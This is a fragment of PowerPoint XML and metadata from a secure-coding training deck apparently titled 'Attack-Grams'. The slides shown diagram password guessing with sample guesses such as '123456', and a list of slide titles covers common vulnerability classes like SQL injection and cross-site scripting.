            <a:ext cx="2630695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1D6BA40-C7AF-704D-9B1F-8219FDA4F934}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3690772" y="2948614"/>
            <a:ext cx="145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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>123456' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i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5DCAEF-9286-B34F-8AD5-A76E9CE82105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566501" y="3292894"/>
            <a:ext cx="2647695" cy="853538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48F63D0-8888-8A4E-83FB-2E07A3303CB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20570414">
            <a:off x="2505216" y="3561853"/>
            <a:ext cx="182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Invalid password!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17866F-70FF-4E42-8C2F-FA2A56493E9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2567504" y="4171484"/>
            <a:ext cx="2646692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453EB07-703B-174C-A38E-CD5CB15BBC9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3566263" y="3843055"/>
            <a:ext cx="16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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>password' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!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EFCF0BD-0245-0946-9215-D888DB9EB2BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566012" y="4202375"/>
            <a:ext cx="2639439" cy="868135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0B6A8D-7E8E-E44E-AFBA-670C4A81E98C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20563066">
            <a:off x="2505014" y="4464282"/>
            <a:ext cx="182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Invalid password!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08D5C5-2014-B34C-895D-C7B07265EF5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3793578" y="465011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00F4E6-168E-2F48-A802-F439CB5AFAC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2583501" y="5496063"/>
            <a:ext cx="2630695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06C3FB-36CC-7848-8DF5-AF92ED93240B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3538663" y="5195167"/>
            <a:ext cx="163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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>ABCDEFG' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!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539125-C3EA-0940-BC5D-1594A5FC35A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566012" y="5541499"/>
            <a:ext cx="2639439" cy="768156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9C91574-6A93-6C4F-86F8-8A08CEE96510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20638428">
            <a:off x="2516078" y="5740911"/>
            <a:ext cx="182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authorized!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3856971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20654</TotalTime>
  <Words>426</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>206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Courier</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>&lt;Secure Coding&gt; Attack-Vectors</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Authentication Bypass</vt:lpstr>
      <vt:lpstr>Reliance on Untrusted Inputs</vt:lpstr>
      <vt:lpstr>Missing/Incorrect Authorization</vt:lpstr>
      <vt:lpstr>Missing Encryption of Sensitive Data</vt:lpstr>
      <vt:lpstr>Use of a Broken Crypto Algorithm</vt:lpstr>
      <vt:lpstr>Unsalted Hash</vt:lpstr>
      <vt:lpstr>Password Guessing</vt:lpstr>
      <vt:lpstr>Integer Overflow</vt:lpstr>
      <vt:lpstr>Download of Code Without  Integrity Check</vt:lpstr>
      <vt:lpstr>Open Redirect</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery</vt:lpstr>
      <vt:lpstr>Upload of Dangerous File</vt:lpstr>
      <vt:lpstr>XML External Entities</vt:lpstr>
      <vt:lpstr>Path Traversal</vt:lpstr>
      <vt:lpstr>OS Command Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Insecure Deserialization</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>Format String Injection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Attack-Grams</dc:title>
  <dc:subject/>
  <dc:creator>Paul Ionescu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kashif Mushtaq</cp:lastModifiedBy>
  <cp:revision>82</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-01-08T18:07:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-01T16:35:49Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>